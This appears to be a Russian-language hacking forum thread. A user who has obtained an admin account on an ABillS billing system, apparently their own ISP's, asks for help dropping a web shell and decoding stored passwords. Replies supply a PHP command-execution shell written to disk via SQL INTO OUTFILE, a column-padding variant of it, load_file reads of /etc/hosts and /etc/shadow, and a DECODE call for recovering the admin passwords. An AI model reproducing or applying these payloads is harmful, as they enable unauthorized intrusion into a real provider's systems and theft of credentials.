Может для когото вопросы покажутся и "детскими", но все-же: Нарыл акк админа, очень бы хотелось залить шелл.В системе присутствует sql commander. Но или я тупой или коммандер какой-то не такой (скорее всего первое ) сайт разработчкика Делаю запрос например на вывод других админов в системе Code: select user,password from admins в ответ выплевывает Как вывести на нормальном языке? Проблема прядли с кодировками, т.к информация (имена пользователей, включая другую информацию)не считая паролей, выводятся в читабельном виде. По поводу шела into outfile как и load не получается использовать (выскакивает ошибка error select tables from blabla). ------------------------------- какие есть варианты?
ну с этим возни больше будет, а вот что с шеллом не получается? напиши конкретно какой запрос делаешь и какую ошибку выкидывает, ну вообщем поподробнее опиши свои действия.
система работает на базе ".cgi" user:abills@localhost database:abills version:5.0.51a-log information_schema выводит ---------------------------------------- SELECT load_file('/etc/hosts') результат Ok Но вывода файла нет =( select load_file('/etc/shadow') ok на права не ругается, значит доступ есть, но опять таки вывода файла нет. --------------------------------------- Дальше колупать(не зная) стремно, как никак мой пров )) --------------------------------------- Может кто подскажет как быть с выводом? или может с заливкой шелла?
так что те мешает найти папку для записи и потом выполнить запрос select '<?php system($_GET["cmd"]); ?>' from mysql.user into outfile 'C:\www...ну вообщем путь до папки для записи (например С\www\tmp\) \ shell.php' ну и потом просто http:\\путь до файла\shell.php?cmd=команда(например dir) p.s. исправил вчера забыл дописать from xd
мешает по идее фильтр. Даже при кодировке 0х+hex вылазит одна и таже ошибка [3] ERROR_SQL /select ` или [3] ERROR_SQL/select (сам запрос)
Я с этим sql commanderом не встречался, но ситуация была похожая. Когда ты делаешь select '<?php system($_GET["cmd"]); ?>' from mysql.user into outfile 'C:\www... , уверен, что количество столбцов в первом и втором selecte совпадает? Пробовал вот так select 1,2,'<?php system($_GET["cmd"]); ?>',4 from mysql.user into outfile 'C:\www... ?
Все кто отвечал так и не смотрели исходники . Сам вот добрался немного посмотрел(хоть сильно в этом и не разбираюсь) так вот пароли выводятся криво из за функции encode как составить запрос для правильного вывода? Как я понял нужно использовать decode. А по поводу встроенного в систему sql commander-a может кто-то все таки не поленится и попробует систему в действии чтобы дать дельный совет по поводу шелла? буду признателен
функция обратная ENCODE это DECODE Code: decode('abills', 'test12345678901234567890') ну или как там у тебя запрос составишь..
